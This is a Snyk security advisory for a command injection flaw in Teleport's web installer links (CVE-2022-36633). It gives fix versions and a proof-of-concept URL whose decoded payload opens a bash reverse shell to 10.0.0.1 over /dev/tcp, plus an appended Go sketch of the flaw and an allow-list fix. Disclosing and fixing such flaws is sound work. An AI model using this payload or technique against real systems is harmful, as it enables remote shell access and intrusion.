Command Injection Affecting github.com/gravitational/teleport/lib/web package, versions <8.3.17 >=9.0.0 <9.3.13 >=10.0.0 <10.1.2
Threat Intelligence
Exploit Maturity: Mature
EPSS: 3.09% (92nd percentile)
- Snyk ID SNYK-GOLANG-GITHUBCOMGRAVITATIONALTELEPORTLIBWEB-2992509
- published 25 Aug 2022
- disclosed 25 Aug 2022
- credit Brandon Roach, Brian Landrum
Introduced: 25 Aug 2022
CVE-2022-36633
How to fix?
Upgrade github.com/gravitational/teleport/lib/web to version 8.3.17, 9.3.13, 10.1.2 or higher.
Overview
github.com/gravitational/teleport/lib/web is a privileged access management tool.
Affected versions of this package are vulnerable to Command Injection via a crafted ssh-agent installation link: a bash escape sequence containing a carriage return / line feed is URL-encoded, supplied in place of the join token in the script path, and the resulting link is sent to a user.
PoC:
Example payload:
https://teleport.site.com/scripts/%22%0a%2f%62%69%6e%2f%62%61%73%68%20%2d%6c%20%3e%20%2f%64%65%76%2f%74%63%70%2f%31%30%2e%30%2e%30%2e%31%2f%35%35%35%35%20%30%3c%26%31%20%32%3e%26%31%20%23/install-node.sh?method=iam
Decoded payload:
"
/bin/bash -l > /dev/tcp/10.0.0.1/5555 0<&1 2>&1 #
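Added example (not Teleport's code and not part of the Snyk record): a Go sketch of the pattern the overview and PoC describe, a token taken from the URL path and interpolated into a generated installer script, beside an allow-list check that stops CR/LF and quotes before the token reaches the template. The template, the token charset and the function names are assumptions; the sample segment uses a harmless echo in place of the real payload.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
	"strings"
)

// Hypothetical installer template modelled on the advisory's pattern (not Teleport's
// real script): a token from the URL path is pasted into a shell script in double quotes.
const scriptTemplate = "#!/bin/bash\nTOKEN=\"%s\"\necho \"joining with token $TOKEN\"\n"

// Allow-list for the token segment (assumption: [A-Za-z0-9_-], 1-64 chars);
// CR, LF and quotes can never pass it.
var tokenRe = regexp.MustCompile(`^[A-Za-z0-9_-]{1,64}$`)

// decodeSegment does what the router does before the handler runs: "%0a" becomes a real newline.
func decodeSegment(seg string) (string, error) {
	return url.PathUnescape(seg)
}

// renderUnsafe interpolates without validation: an injected '"' + newline closes the
// quoted assignment and whatever follows runs as its own command.
func renderUnsafe(token string) string {
	return fmt.Sprintf(scriptTemplate, token)
}

// renderSafe rejects anything outside the allow-list before it reaches the template.
func renderSafe(token string) (string, error) {
	if !tokenRe.MatchString(token) {
		return "", fmt.Errorf("invalid token %q: only [A-Za-z0-9_-]{1,64} allowed", token)
	}
	return fmt.Sprintf(scriptTemplate, token), nil
}

// scriptLines counts lines; the template has three, more means a smuggled command.
func scriptLines(script string) int {
	return len(strings.Split(strings.TrimRight(script, "\n"), "\n"))
}

func main() {
	// Constructed sample: the advisory's technique with a harmless echo in place of the payload.
	token, _ := decodeSegment("%22%0aecho%20injected%20%23")
	fmt.Printf("unsafe render (%d lines):\n%s", scriptLines(renderUnsafe(token)), renderUnsafe(token))
	if _, err := renderSafe(token); err != nil {
		fmt.Println("safe render:", err)
	}
}
```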
CVSS Scores (version 3.1)